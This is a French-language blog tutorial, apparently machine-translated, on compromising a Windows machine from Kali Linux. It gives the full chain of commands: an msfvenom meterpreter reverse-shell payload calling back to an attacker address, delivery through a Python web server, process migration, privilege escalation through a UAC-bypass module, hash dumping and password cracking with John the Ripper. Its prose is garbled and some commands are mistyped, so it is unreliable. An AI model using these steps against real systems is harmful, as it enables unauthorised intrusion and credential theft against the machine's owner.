Accéder au contenu principal

Piratage du système dans Kali Linux

Piratage du système dans Kali Linux

Système de piratage avec Kali Linux. Ce tutoriel est uniquement à des fins éducatives.

Qu'est-ce que le piratage de système?

Moyen illégal d'accéder à l'ordinateur de quelqu'un qui pirate le système d'appel d'un pirate informatique pirate le système à l'aide du logiciel malveillant, de la charge utile et du virus, Certains types de piratage sont parfaitement légaux, L'une des méthodes les plus importantes utilisées par les pirates pour contourner l'authentification standard est le craquage de mot de passe .

C'est en fait la toute première étape du processus de piratage du système. un hacker doit accéder physiquement au système cible et injecter le système cible de charge utile. Essayons quelques exemples

Piratage du système Windows!

Tout d'abord, nous créons une charge utile à l'aide du framework metasploit, exécutez simplement la commande. la charge utile est la partie des données transmises qui est le message réellement prévu.

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.103 lport=4545 -f exe > hackNos.exe

Utilisations des paramètres

  • -p Charge utile à utiliser
  • Adresse IP de l'attaquant "lhost"
  • Port de liste des attaquants "lport"
  • -f Formate de sortie
  • > Nom du fichier de sortie de la charge utile

et nous démarrons notre écouteur de charge utile Metasploit et chargeons le module multi handler

notre gestionnaire TCP démarre maintenant, nous démarrons tout serveur J'utilise python SimpleHTTPServer pour transférer notre système cible de charge utile.

python -m SimpleHTTPServer 80

ouvrez n'importe quel navigateur et téléchargez le système cible de la charge utile

notre téléchargement est terminé maintenant cliquez sur le bouton Ouvrir et exécutez la charge utile

Maintenant, la machine cible du shell meterpreter exécute la commande "sysinfo " qu'elle affiche à propos des informations système.

sysinfo

nous passons à l'étape suivante, vidons tous les hachages, mais d'abord, nous migrons notre charge utile avec une autre commande ps du processus en cours d'exécution est afficher toute la machine cible du processus en cours d'exécution

ps
migrate 4040

et exécutez la commande getsystem pour l'accès au compte administrateur et nous faisons face à une erreur priv_elevate_system nous avons maintenant l'autorisation d'accéder au compte administrateur nous pouvons contourner l'erreur en utilisant le moudule de post-exploitation

get system
background

Post exploitation

exécuter la session en arrière-plan et charger le module bypassuac_eventvwr et définir le nom de la session

use exploit/windows/local/bypassuac_eventvwr
set session 1
run

et la nouvelle session meterpreter est ouverte à nouveau exécutez la commande getsystem notre commande est exécutée avec succès

getsystem
hashdum

Cracking de hachage de Windows

enregistrer le hachage dans un fichier et en utilisant l'outil john, nous pouvons déchiffrer les listes de mots de hachage choisissez le chemin de vos listes de mots

cat hash.txt
john --wordlists=/usr/share/wordlists/rockyou.txt --format=NT hash.txt

Partagez avec vos amis et apprenez avec nous!

Pour apprendre les didacticiels de piratage et Python, rejoignez notre chaîne de didacticiels sur le piratage et Python à partir des liens telegrams.




Commentaires